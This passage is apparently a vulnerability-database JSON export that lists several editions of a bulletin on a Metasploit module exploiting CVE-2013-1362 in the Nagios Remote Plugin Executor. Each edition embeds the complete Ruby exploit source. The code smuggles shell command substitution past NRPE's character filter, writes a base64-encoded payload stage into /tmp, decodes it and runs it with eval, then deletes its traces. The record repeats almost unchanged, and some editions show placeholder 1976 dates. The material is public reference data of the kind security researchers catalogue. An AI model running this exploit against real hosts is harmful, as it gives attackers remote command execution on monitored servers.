@ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-20T05:38:35", "differentElements": ["modified", "published"], "edition": 17}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-12-31T11:57:46", "history": [], "viewCount": 17, "enchantments": {"score": {"value": 6.0, "modified": "2017-12-31T11:57:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-12-31T11:57:46", "differentElements": ["modified", "published"], "edition": 18}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-12-31T13:55:58", "history": [], "viewCount": 17, "enchantments": {"score": {"value": 6.0, "modified": "2017-12-31T13:55:58"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-12-31T13:55:58", "differentElements": ["modified", "published"], "edition": 19}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-01-07T14:01:46", "history": [], "viewCount": 17, "enchantments": {"score": {"value": 6.0, "modified": "2018-01-07T14:01:46"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-01-07T14:01:46", "differentElements": ["modified", "published"], "edition": 20}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-01-07T16:01:32", "history": [], "viewCount": 17, "enchantments": {"score": {"value": 6.0, "modified": "2018-01-07T16:01:32"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-01-07T16:01:32", "differentElements": ["modified", "published"], "edition": 21}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-01-15T08:01:40", "history": [], "viewCount": 17, "enchantments": {"score": {"value": null, "modified": "2018-01-15T08:01:40"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor 